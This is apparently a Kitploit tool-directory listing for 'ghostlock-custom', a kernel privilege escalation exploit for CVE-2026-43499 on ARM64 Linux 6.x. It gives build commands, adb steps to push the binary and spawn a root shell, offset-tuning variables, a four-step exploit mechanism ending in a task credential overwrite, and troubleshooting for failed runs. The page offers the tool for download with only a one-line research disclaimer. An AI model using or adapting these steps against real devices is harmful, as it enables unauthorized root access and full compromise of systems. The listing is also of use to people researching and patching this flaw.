Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ghostlock-custom — GhostLock (CVE-2026-43499) adaptation for non-Android Linux 6.x ARM64 | Kitploit
Tools/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
Privilege EscalationVulnerability AnalysisExploitationBinary Exploitation
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

GhostLock (CVE-2026-43499) adaptation for non-Android Linux 6.x ARM64

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
71 month agoNot yet reviewed

GhostLock Custom — CVE-2026-43499 Adaptation

A GhostLock (CVE-2026-43499) privilege escalation exploit targeting non-Android Linux 6.x ARM64 kernels.

Kernel Characteristics

ItemValue
ArchitectureARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
Kernel version6.x
SELinuxNone
ashmemNone
configfsNone

Compilation

Local Build (requires a cross-compiler)

make

Android NDK Build

make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (Cloud Build)

Builds are triggered automatically after pushing; just download the artifact.

Usage

# Push to the target device
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# Get a root shell
adb shell /data/local/tmp/e --shell

# Adjust the pselect offset (if the default doesn't work)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# Specify the physical load address
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

Environment Variables

VariableDefaultDescription
PSELECT_SHIFT-2Offset adjustment for the pselect waiter on the stack
KPHYS0x80000000Kernel physical load address
KIMAGE_TEXT_BASE0xffffffc008000000Kernel virtual base address

Exploit Mechanism

  1. futex PI race: FUTEX_CMP_REQUEUE_PI triggers a UAF in remove_waiter()
  2. pselect stack overwrite: The freed rt_mutex_waiter lands in the stack_fds buffer
  3. PI tree write: Arbitrary kernel address write via a crafted fake waiter
  4. cred overwrite: Overwrite task_struct->cred with init_cred

Adaptation Notes

This version is a stripped-down variant of ghostlock-oneplus:

  • Removed SELinux disabling code (this kernel has no SELinux)
  • Removed ashmem/configfs-related code (this kernel has none of these components)
  • Removed KernelSU installation code
  • Removed SLIDE KASLR leak (no loggers/nfulnl_logger)
  • Removed Android-specific code (miniADB, etc.)

Troubleshooting

SymptomPossible CauseSolution
Device rebootsIncorrect PSELECT_SHIFTTry each value from -4 to +4
No effectIncorrect KPHYSVerify the correct value in /proc/iomem
perf_event_open failedseccomp restrictionTry running via ADB shell
No rootOffset mismatchConfirm the kernel version, check TASK_CRED_OFF

Disclaimer

This tool is for security research purposes only. Users assume all responsibility.

Download Tool